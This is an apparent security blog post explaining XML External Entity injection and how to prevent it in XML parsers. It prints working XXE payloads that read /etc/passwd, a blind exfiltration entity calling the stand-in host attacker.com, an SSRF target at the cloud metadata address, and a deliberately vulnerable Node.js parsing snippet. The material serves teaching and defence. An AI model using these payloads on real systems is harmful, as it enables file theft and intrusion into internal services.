EncryptCodecencryptcodec
Blog/Injection
InjectionApril 8, 2026 · 9 min read

XML External Entity (XXE) Injection: How to Find, Exploit, and Prevent It

You push a new endpoint that accepts XML for a legacy integration. QA signs off. Six months later a bug bounty hunter reads /etc/passwd off your production server and files a critical report — and the fix is a single line of parser configuration you never knew you needed.

XXE is one of the most underestimated injection classes because the vulnerability isn't in your code, it's in a library default. Disable external entity processing in your XML parser and you eliminate the entire attack surface. Everything below shows you why that default exists, how attackers abuse it, and exactly how to turn it off across the stacks developers actually use.

Why XML Parsers Resolve External Entities at All

The XML 1.0 spec includes a feature called external entities — a way to include content from another file or URL inside an XML document. It was designed for things like shared DTD fragments in document publishing pipelines. Nobody building REST APIs needs it, but most XML parsers enable it by default because the spec says they should.

When a parser encounters this:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

It opens /etc/passwd, reads its contents, and substitutes them into the document before your application code ever sees the XML. The file read happens inside the parser, before any of your validation logic runs.

The Three XXE Attack Patterns

Classic file read is the most common. The attacker injects an entity pointing to a local file path (file:///etc/passwd, file:///proc/self/environ, C:\Windows\win.ini on Windows) and the response reflects the file contents. This works whenever the parsed content is echoed back — an error message, a response field, a document preview.

Parser reads local files and echoes content in the response.

Payload
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
</user>
IMPACTArbitrary local file read
DETECTEasy — response reflects file content
Attack Flow

Click a step to highlight it

Relative Exploitability vs. Stealth
Exploitability95%
Stealth20%

Blind XXE via out-of-band exfiltration is used when the application parses the XML but doesn't echo the result. The attacker defines an entity that makes an HTTP request to a server they control:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=secret">
]>

Even if the app returns nothing, the attacker's server logs the request. With a slightly more sophisticated two-stage payload using parameter entities, they can exfiltrate actual file contents through DNS lookups — bypassing firewalls that block outbound HTTP.

SSRF via XXE targets internal services. The entity URL points to http://169.254.169.254/latest/meta-data/ (AWS instance metadata), internal admin panels, or other services on the private network that aren't exposed publicly. The server fetches the URL on the attacker's behalf and may return the response.

Where XXE Hides in Real Applications

The obvious place is any endpoint that accepts Content-Type: application/xml. The non-obvious places are what trip up developers:

File upload handlers that process DOCX, XLSX, PPTX, ODT, or SVG files. These are ZIP archives containing XML. If your server unzips and parses them, every upload endpoint becomes an XXE surface. A malicious SVG uploaded as a profile picture has exploited production apps at major companies.

SOAP web services still exist everywhere in enterprise Java and .NET stacks. Every SOAP request is XML. Legacy integrations that nobody touches for years are often running ancient parser configurations.

PDF generators that accept HTML with embedded SVG. The PDF library parses the SVG, which can contain XXE payloads.

XML-based configuration parsers — if your app lets users upload configuration files in XML format (think Ant build files, Maven POMs, or custom formats), those go through a parser too.

How to Exploit XXE Safely in a Lab

Before you test anything in production, understand the mechanics in a controlled environment. A basic Node.js setup demonstrates the issue clearly:

# Install a vulnerable XML parsing setup for local testing only
npm install libxmljs
// VULNERABLE - do not use in production
const libxmljs = require('libxmljs');

const payload = `<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user><name>&xxe;</name></user>`;

// libxmljs resolves external entities by default in older versions
const doc = libxmljs.parseXml(payload);
console.log(doc.get('//name').text()); // prints /etc/passwd contents

The LIBXML_NOENT flag in PHP is the single most common XXE mistake I've seen in code reviews. Developers add it thinking "NOENT" means "no entities" — it actually means "substitute entities from the DTD." At least one significant PHP application had this exact misconfiguration in a file upload path for years.

Prevention: The Exact Configuration You Need

The fix is the same everywhere: disable DTD processing entirely, or at minimum disable external entity resolution. If you don't have a legitimate use case for DTDs (almost nobody does), disable them completely.

// Use a safe-by-default parser
// Option 1: fast-xml-parser (no external entity support)
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser();
const result = parser.parse(xmlString);

// Option 2: If you must use libxml-based parsing, use xml2js which
// does not resolve external entities by default
const xml2js = require('xml2js');
xml2js.parseString(xmlString, (err, result) => {
// safe — external entities not resolved
});

One Edge Case That Catches Senior Developers

If you're using JSON APIs exclusively, you might think you're safe. You're not if you're using Spring Boot with the Jackson XML module (jackson-dataformat-xml), or if your content negotiation middleware accepts both JSON and XML based on the Content-Type header. An attacker sends Content-Type: application/xml to your JSON endpoint. If the framework routes it to an XML deserializer, the parser configuration on that path might be different from your main XML handler.

Test every endpoint with both Content-Type: application/json and Content-Type: application/xml headers. The XML path may never have been reviewed.

Audit Checklist

Before you close the ticket, verify these:

  • Every XML parser instance has external entity processing disabled — not just the ones you wrote this week
  • File upload handlers for DOCX, XLSX, SVG, and ODT validate file type and parse with a hardened parser
  • SOAP endpoints use the same secured DocumentBuilderFactory
  • Content negotiation middleware doesn't route unexpected XML to a less-secured parser
  • Outbound network access from your app servers is restricted so blind XXE can't easily exfiltrate data even if a parser is misconfigured (defense in depth, not a primary control)

Grep your codebase for LIBXML_NOENT, resolve_entities=True, DocumentBuilderFactory.newInstance() without subsequent feature flags, and any use of XMLInputFactory.newInstance() in Java without SUPPORT_DTD set to false. Those are the patterns to hunt.

Pick one XML-consuming endpoint in your current project right now — a file upload, a SOAP service, a feed parser — and verify its parser configuration against the code above. One afternoon of auditing eliminates an entire OWASP Top 10 category from your attack surface.

Share this post

Try the SSRF simulation — XXE's close cousin for internal network attacks

Free, browser-based — no signup required.

Frequently Asked Questions